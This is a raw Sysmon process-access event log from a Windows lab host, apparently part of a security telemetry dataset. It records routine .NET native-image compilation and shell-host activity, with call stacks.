14:57:34.670{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-EC0C-00000000BB01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.670{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-EC0C-00000000BB01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.608{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-EB0C-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.592{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-EB0C-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.592{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-EB0C-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.545{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-EA0C-00000000BB01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.530{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-EA0C-00000000BB01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.530{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-EA0C-00000000BB01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.483{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-E90C-00000000BB01}3516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.467{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-E90C-00000000BB01}3516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.467{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-E90C-00000000BB01}3516C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.389{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-E80C-00000000BB01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.374{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-E80C-00000000BB01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.374{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-E80C-00000000BB01}6116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.342{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-E70C-00000000BB01}7084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDE-607E-E70C-00000000BB01}7084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDE-607E-E70C-00000000BB01}7084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.327{A7A01FEF-B626-607E-0D00-00000000BB01}1008728C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 